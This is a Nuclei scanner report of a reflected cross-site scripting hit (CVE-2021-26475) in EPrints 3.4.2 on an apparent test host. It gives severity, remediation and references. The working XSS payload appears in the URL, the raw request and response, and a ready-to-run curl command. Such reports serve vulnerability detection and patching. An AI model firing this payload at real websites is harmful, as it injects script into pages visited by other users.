EPrints 3.4.2 - Cross-Site Scripting (CVE-2021-26475) found on honey.scanme.sh

[mkrs2404]

Details: CVE-2021-26475 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%272fp47zHs6nd9C0zIitcLlTiBIBv%27)%3C/script%3E

Timestamp: Tue Apr 30 13:42:06 +0000 UTC 2024

Source: https://cloud.projectdiscovery.io/vuln/ca870fce852cab45140ed0a9f69bb785

Template Information

Key	Value
Name	EPrints 3.4.2 - Cross-Site Scripting
Authors	geeknik
Tags	cve2021, cve, xss, eprints, intrusive
Severity	medium
Description	EPrints 3.4.2 contains a reflected cross-site scripting vulnerability via the cgi/cal URI.
Remediation	Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability.
CVSS-Metrics	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE-ID	CWE-79
CVE-ID	CVE-2021-26475
CVSS-Score	6.10
vendor	eprints
product	eprints

Request

GET /cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%272fp47zHs6nd9C0zIitcLlTiBIBv%27)%3C/script%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 326
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:42:06 GMT

GET /cgi/cal?year=2021</title><script>alert('2fp47zHs6nd9C0zIitcLlTiBIBv')</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4

References:

• https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
• https://files.eprints.org/2548/
• https://nvd.nist.gov/vuln/detail/CVE-2021-26475
• https://github.com/ARPSyndicate/cvemon
• https://github.com/ARPSyndicate/kenzer-templates

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4' 'https://honey.scanme.sh/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%272fp47zHs6nd9C0zIitcLlTiBIBv%27)%3C/script%3E'

---

Generated by Nuclei v3.2.5